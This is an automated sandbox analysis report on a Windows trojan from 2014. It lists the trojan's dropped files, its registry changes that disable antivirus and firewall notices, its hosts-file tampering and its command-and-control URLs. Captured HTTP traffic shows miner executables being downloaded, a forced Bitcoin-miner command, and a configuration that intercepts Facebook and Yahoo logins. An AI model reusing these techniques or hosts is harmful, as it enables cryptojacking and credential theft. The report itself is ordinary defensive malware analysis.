MD5: fd42410aa308ae0674e298f2c749ba62
SHA1: da282623ec81a852dd290d17eca1d77f573f6b97
SHA256: f684e7a4324eabefb195243aecf77bcda0f168883a9a605abbd34083916c7a2f
SSDeep: 24576:IErbkTcNhxweBRDvLQLRJYT2E3S53gJxygxA1b G:x8qb4Yb3 01et
Size: 855040 bytes
File type: EXE
Platform: WIN32
Entropy: Probably Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-04-07 09:18:36
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

ocpqnmwyvi.exe:2212
ocpqnmwyvi.exe:2080
%original file name%.exe:628
wuauclt.exe:304
sgupsfom6d23um.exe:4708
sgupsfom69tcumfnx1sg.exe:2612
sgupsfom6y57um.exe:5940
sgupsfom6l2aum.exe:3140
ggkzvymkohy.exe:4980
ggkzvymkohy.exe:3708

The Trojan injects its code into the following process(es):
No processes have been created.

File activity

The process ocpqnmwyvi.exe:2212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\hntwpyzd\tst (10 bytes)

The process ocpqnmwyvi.exe:2080 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\hntwpyzd\tst (10 bytes)

The process %original file name%.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\sgupsfom69tcumfnx1sg.exe (6296 bytes)
%System%\hntwpyzd\tst (10 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\sgupsfom69tcumfnx1sg.exe (0 bytes)

The process wuauclt.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)

The Trojan deletes the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)

The process sgupsfom69tcumfnx1sg.exe:2612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\hntwpyzd\etc (10 bytes)
%System%\ggkzvymkohy.exe (6841 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\hntwpyzd\tst (10 bytes)

The Trojan deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

The process sgupsfom6l2aum.exe:3140 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\hntwpyzd\tst (10 bytes)

The process ggkzvymkohy.exe:4980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\hntwpyzd\tst (10 bytes)

The process ggkzvymkohy.exe:3708 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\hntwpyzd\run (10 bytes)
%System%\win32drkclient.exe (25340 bytes)
%System%\win64drkaesent.exe (67687 bytes)
%WinDir%\Temp\sgupsfom6x6xum.exe (1940 bytes)
%System%\hntwpyzd\tst (10 bytes)
%System%\hntwpyzd\cfg (711 bytes)
%WinDir%\Temp\sgupsfom6l2aum.exe (6841 bytes)
%System%\win64drkclient.exe (68472 bytes)
%System%\hntwpyzd\ihst (444 bytes)
%System%\drivers\etc\hosts (100 bytes)
%WinDir%\Temp\sgupsfom6d23um.exe (35 bytes)
%WinDir%\Temp\sgupsfom6y57um.exe (35 bytes)
%System%\ocpqnmwyvi.exe (6841 bytes)
%System%\hntwpyzd\por (1 bytes)
%System%\hntwpyzd\rng (204 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\sgupsfom6d23um.exe (0 bytes)
%WinDir%\Temp\sgupsfom6y57um.exe (0 bytes)
%WinDir%\Temp\sgupsfom6x6xum.exe (0 bytes)
%WinDir%\Temp\sgupsfom6l2aum.exe (0 bytes)

Registry activity

The process sgupsfom6d23um.exe:4708 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 70 97 F0 D3 F9 D1 02 5E 16 A6 50 69 21 AA BA"

The process sgupsfom69tcumfnx1sg.exe:2612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 47 56 51 AE 11 C6 EF 49 23 FA 28 B0 C5 F6 69"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Background Quality Color Authentication Detection" = "%System%\ggkzvymkohy.exe"

The process sgupsfom6y57um.exe:5940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E 0F 9D 17 16 7D A7 37 7C D4 46 51 63 97 FC 0F"

The process sgupsfom6l2aum.exe:3140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 05 7E 42 3B 0D FD 7B D1 07 6B B3 D8 C3 8C A8"

The process ggkzvymkohy.exe:3708 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 BB 9B F2 08 AF DC 38 61 F0 03 0D 68 27 77 3C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 100 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://tablefruit.net/forum/search.php?method=validate&mode=sox&v=027&sox=3cadb000	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=all&flag&mode=sox&v=027&sox=3cadb000&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM)2 Duo CPU E6550 @ 2.33GHz (2337 MHz)&mode=sox&v=027&sox=3cadb000&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=hostname&host=www.facebook.com&mode=sox&v=027&sox=3cadb000&lport=1&rsid=3bf3da02&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=setvar&key=connected&value=3bf3da02&mode=sox&v=027&sox=3cadb000&lport=1&rsid=3bf3da02&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/dep/win64drkclient.exe	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=checkport&port=38281&mode=sox&v=027&sox=3cadb000&lport=1&rsid=3bf3da02&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/dep/win32drkclient.exe	98.139.135.198
hxxp://tablefruit.net/dep/win64drkaesent.exe	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=post&type=miner_forced&mode=sox&v=027&sox=3cadb000&lport=1&rsid=3bf3da02&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=all&mode=sox&v=027&sox=3cadb000&lport=1&rsid=3bf3da02&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/forum/pingtest	98.139.135.198
hxxp://partyorderly.net/dep/win64drkaesent.exe	98.139.135.198
hxxp://partyorderly.net/dep/win64drkclient.exe	98.139.135.198
hxxp://partyorderly.net/dep/win32drkclient.exe	98.139.135.198

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Initial Connection Server Response
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

POST /forum/search.php?method=post&type=miner_forced&mode=sox&v=027&sox=3cadb000&lport=1&rsid=3bf3da02&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 131

data=c3Bhd25lZDogJ3dpbjMyZHJrY2xpZW50LmV4ZSAtYSBYMTEgLW8gc3RyYXR1bSt0Y3A6Ly8xMDguMTc0LjE0Ni43ODozMzg4IC11IDNjYWRiMDAwIC1wIHgnDQo=
HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:55:46 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
.............

GET /dep/win64drkclient.exe HTTP/1.0

Accept: */*

Connection: close

Host: partyorderly.net

HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:55:23 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Fri, 21 Feb 2014 20:25:42 GMT

Accept-Ranges: bytes

Content-Length: 2785792

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d...K..S
.................. ..~*..V............@..............................@
 .....M/ ....... .......................................*.......*..$..
..........(...............*.8I.......................... .*.(.........
............*[email protected]..... ....... .........
........`.p`.data...`..... ....... [email protected]`....!..b
....!.............@.`@.pdata........(.......'[email protected]@.xdata..
<....0).......).............@.@@.bss.....U...0*....................
...`..edata........*.......)[email protected]@.idata...$....*..&....*..
[email protected].....*......4*.............@[email protected].....*
......6*.............@.`..reloc..8I....*..J...8*[email protected].....
......................................................................
......................................................................
................................................ffffff.........H..(1.f
.=....MZ...Z*........Z*........Z*........Z*.....tg....*....Z*...tH....
..uw .H......... ....Z*.H...s*.H...s*.H....*...... ..=(.!..tf1.H..(...
....-w ......Hc.....H..B...H...:PE..u...J.f....t?f......j............]
.........1.......K...f.H.... .... .1.H..(..zt...,.........1...........
.H..8..&Z*.D../Z*.L....*.H....*.H....*.....*.H....*.H.D$ .sv .....*.H.
.8.........AUATUWVSH......D...Y*.1......H.T$ E..H...H.......eH..%0...1
.H.X.H.=i.*..........H9...'..........H...H....r*.H..u....r*.1.....
<<< skipped >>>

GET /forum/search.php?method=all&flag&mode=sox&v=027&sox=3cadb000&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:55:21 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
ping.5.FLAG cfg.241."spendmarry.net" "glasshealth.net" "requireneither
.net" "littleappear.net" "necessarydress.net" "uponloud.net" "frontrid
e.net" "mightglossary.net" "tablefruit.net" "throughcountry.net" "stic
kmarch.net" "gentlefriend.net" "rememberpaint.net" var_user_ip.479.%ki
ll_jhminer% = "1";.%set_intercepts% = ""VVV.facebook.com" "partyorderl
y.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/
fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/"
 "/config/" "0" ";.Þp_host% = "partyorderly.net";.Þp_path% = "/dep
/";.%no_password% = "0";.%timer% = "480";.%state% = "BU";.%cpuinfo% = 
" Intel(R) Xeon(R) CPU E7- 2830 @ 2.13GHz (2130 MHz)";.%port% = "32169
";.%relay_soxid% = "3bf3da02";.%ip% = "79.112.127.198";.plugin.55070.m
iner_forced.80.win32drkclient.exe -a X11 -o stratum tcp://XXX.XXX.XXX.
78:3388 -u 3cadb000 -p x.MZ......................@....................
...........................!..L.!This program cannot be run in DOS mod
e....$.........lg...4...4...4.?y4...4...4...49..4...4...4...4...4...4.
..4...4...4...4Rich...4................PE..L.....\S...................
..N....................@..............................................
...............................(......................................
.................................@...............(....................
........text...H........................... ..`.rdata...!.......".....
.............@[email protected].... ..........................@................
..................................................................
<<< skipped >>>

GET /forum/pingtest HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:56:22 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Mon, 14 May 2012 04:16:44 GMT

Accept-Ranges: bytes

Content-Length: 101376

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
....jj..5j.s.......\F@|.#C>W....H!...4.jR.s5)....#\....F.RW#r....F.
H\.j..-5R.m.).!....F..<#.}..r.KH....\oqR...).....m...6....kr}....f.
\..&.oYl..,......m...6EL}."....u.f.Bo.D..Y...,Q.m..56....Eja.".ef.....
m.YD..,..2.Qm...6.E..."j....f...3.Dm.o....Q....m.6.6q.j.8~.....f..m3..
..c.....m...6..<.qv..8;.f...3........c.Y...%....q.~E8v...;.O......w
.c.;.............v~c.;.........l..w...;[%...?....~..e.c..........wl..;
....[.z..?|....c..}.......%l.......[.....~z.??|.......}.......e...#...
.....?~~^.??........................;~...?~...?xo...s..........wT..;e.
...~..5?....x........|e...p.w_..;....W... .x......5.....|..w...;_....~
x.W?{. .\..O.....|..%...._.......W~}v ?>......O....g....-...o...#~.
..?}.~.>}<O.>......g.....Q........}.xs>....}...>o[g..d.
.[....3.......b.xu&}.:.>....o.O.....[s:..9.....x....u...:..o.qf..8.
[....s...9g...3.u...:........q.<.8q.s..?9..{.g. .3....{....=q..|8.o
..q......g...3.....{m.{.....W....qowD..;].......3....{{s3...R..\.o..p.
wW..;.2..U...*.{..e.s.|..e..\..w...;Wl9...R.U[..*-.s.......\e.-....W.y
..l..U.^;*[...-W=....e......F..u.ly:F...@[^..-....W.r............yu@7.
:..^..-...~W.t3...S......n.u...:@."..m...6....u.t.........G.n..@.|...&
gt;..m...6O.t.....SV..).n..~.....|.im>.v6.a..O0......S...)......|..
F>[email protected].).....M...&n.....x.na...0....o.0.7`x..0l.M...&
..x......B..a.o.0.7....`L.M0&.&..k...>..D......a...0hU`...0LZ..&...
.....k..D5"a...0....hF.L...&ZQ...(.....Dk.X.5.1....h.AN.F GZ....Q...(.
4k.r.5.9.........FA.L. s.Q..E(.....n..r.-.9.q...%A... .{..s....^l.
<<< skipped >>>

GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM)2 Duo CPU E6550 @ 2.33GHz (2337 MHz)&mode=sox&v=027&sox=3cadb000&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:55:22 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
.............

GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=027&sox=3cadb000&lport=1&rsid=3bf3da02&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:55:23 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
..........................

GET /dep/win64drkaesent.exe HTTP/1.0

Accept: */*

Connection: close

Host: partyorderly.net

HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:55:36 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Mon, 24 Feb 2014 22:08:01 GMT

Accept-Ranges: bytes

Content-Length: 2777088

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d......S
.................. ..\*[email protected]
 .......*....... .......................................*.......*..$..
..........'...............*..G.......................... .*.(.........
............*[email protected]..... ....... .........
........`.p`.data......... ....... [email protected]...&....!..(
....!.............@.`@.pdata........'.......'[email protected]@.xdata..
......).......(.............@.@@.bss....`b....*.......................
`..edata........*.......)[email protected]@.idata...$....*..&....).....
[email protected].....*.......*.............@[email protected].....*...
....*.............@.`..reloc...G....*..H....*[email protected]........
......................................................................
......................................................................
.............................................ffffff.........H..(1.f.=.
...MZ.._@*.......Q@*.......C@*.......I@*.....tg....)...K@*...tH......e
. .H........( ...;@*.H...`*.H..u`*.H....*.....- ..=..!..tf1.H..(......
... ......Hc.....H..B...H...:PE..u...J.f....t?f......j............]...
......1.......K...f.H...- ...- .1.H..(..zt...,.........1............H.
.8...?*.D...?*.L....).H....).H....).....).H....).H.D$ .c. .....).H..8.
........AUATUWVSH......D...?*.1......H.T$ E..H...H.......eH..%0...1.H.
X.H.=i.*..........H9...'..........H...H...._*.H..u...._*.1........
<<< skipped >>>

GET /forum/search.php?method=setvar&key=connected&value=3bf3da02&mode=sox&v=027&sox=3cadb000&lport=1&rsid=3bf3da02&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:55:23 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
...........HTTP/1.0 200 OK..Date: Mon, 28 Apr 2014 17:55:23 GMT..P3P: 
policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM
 DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi
 IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV".
.Content-Type: text/html..Age: 0..Server: YTS/1.20.28...............

GET /forum/search.php?method=checkport&port=38281&mode=sox&v=027&sox=3cadb000&lport=1&rsid=3bf3da02&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:55:30 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 30

Server: YTS/1.20.28

GET /forum/search.php?method=validate&mode=sox&v=027&sox=3cadb000 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:55:20 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
304.d.eS........tablefruit.net.........\../.....Y?....e.X....;..R...dW
.....ol....P.n......3V.*.=..d [email protected].].[u..,../`._.
...8.7P.....M]...1.R..=Pl......,h.[B..6a..........d..Lu.._...xYB9..o.2
..d..=.......A.).L..b.>.Q..w ..4_.>.=.ms6{VS.Px....D...SK....O..
.Dg...s..U......j..].OAZ..s... ......3.t..5.............v...Q<.....
.....h..f.^..4....9....{..`4.....j.%.2<4]U..i..............Mt....V.
dI...s...rL{....)_.....sm.K7Q..Cd.. \.}.I.k.xE.n`vqo..l...BI....x%..z?
.l ............:w&...(].Y.. !..=.7.9r...v.'$...>[email protected]_.....86%.
i...ud..H}.y....s..O..1...,..(j.s.....b`N.<.*.:..&..Q..S..m7..f.}..
.8o(.....Pv.T....z.GS....N...=o.bW.......3C..=.D..#X.`t.b..a.....q%;C.
}}..B....\>0HY<R......Q...r6..b...G......34.4#...'....(BP....2.r
Ou....Wp..F.....;:.._q...W`.L.#Wz.2......g>w....n..F.[..._..W.\M.%.
[email protected]...%.Y......H..$_F.7e..(.*...k....SB........<6.d...dtl
....(2F.....YV..{...w..ez.&.7.hP..X.Kk....../....)%.......x*."zD....R.
'.T.v......x..A.....F..M=...T.R.Q8...dY..)..p.D..3.......W...R.:y..7.`
#t.bcgi.m.V..%..().......6b=F>.8YM...5.^Q..........Jj.............l
"=...a.......& Ao.\W...3....\D..?.V....K.[Us..........;.l..,.........i
M....`GO...x.-..

GET /forum/search.php?method=all&mode=sox&v=027&sox=3cadb000&lport=1&rsid=3bf3da02&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:55:58 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
ping.5.FLAG cfg.241."tablefruit.net" "throughcountry.net" "spendmarry.
net" "rememberpaint.net" "stickmarch.net" "gentlefriend.net" "littleap
pear.net" "glasshealth.net" "requireneither.net" "frontride.net" "migh
tglossary.net" "necessarydress.net" "uponloud.net" var_user_ip.389.%se
t_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/
login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "
0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.Þ
p_host% = "partyorderly.net";.Þp_path% = "/dep/";.%no_password% = "0
";.%timer% = "7200";.%state% = "BU";.%cpuinfo% = "Intel(R) Core(TM)2 D
uo CPU E6550 @ 2.33GHz (2337 MHz)";..............

GET /dep/win32drkclient.exe HTTP/1.0

Accept: */*

Connection: close

Host: partyorderly.net

HTTP/1.0 200 OK

Date: Mon, 28 Apr 2014 17:55:33 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Sun, 23 Feb 2014 00:22:10 GMT

Accept-Ranges: bytes

Content-Length: 962048

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...9?.S
.................:....... ...........P....@...........................
......W......... .....................................................
....................................................................`.
...........................text....9.......:..................`.``.dat
a........P.......>[email protected]...`...L...F.........
.....@.`@.bss..................................`..idata...............
[email protected][email protected].... ..
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...................................................&......'.......1.f.
[email protected]..$....
.......$.............N..P.N..T.N..4.N.........=dWM..tm1.......&......$
...........f...<.@[email protected][email protected]?f......j...........
.].........1.......K....v...$..L......1......yt...,.........1.........
..f...,. .N..D$...N..D$...N..D$...N....N..$.N...$..N..D$.........N...,
.........'....U1........WV.U.S....|...0.b...)..D$...........@......@..
....@......@......@......@[email protected]..
<<< skipped >>>

.text

`.rdata

@.data

RSSSSSSh

UUj%U

SQSSSh

L$dh%sJ

Sh%sJ

I <~%f

_.Cuf

Uh%sJ

SSSh0

Vh%sJ

Z|SSShP

tMSSShPmD

D$,SSShP

SSShPmD

t SSSh

~*SSSh

t{SSShP

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

KERNEL32.dll

GetKeyboardType

USER32.dll

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

ggkzvymkohy.exe

um.exe

ocpqnmwyvi.exe

@W.iFd

QC.cP

_.ieu

,A.Fk

.JP%Bj

%X),U'L

PûH

0F5%F

.ES/a

I-i%D

zcÁ

%Documents and Settings%\LocalService

|%System%\ocpqnmwyvi.exe

|tablefruit.net

WATCHDOGPROC "c:\windows\system32\ggkzvymkohy.exe"

%System%\ggkzvymkohy.exe

mscoree.dll

KERNEL32.DLL

sgupsfom6l2aum.exe_3140:

.text

`.rdata

@.data

RSSSSSSh

UUj%U

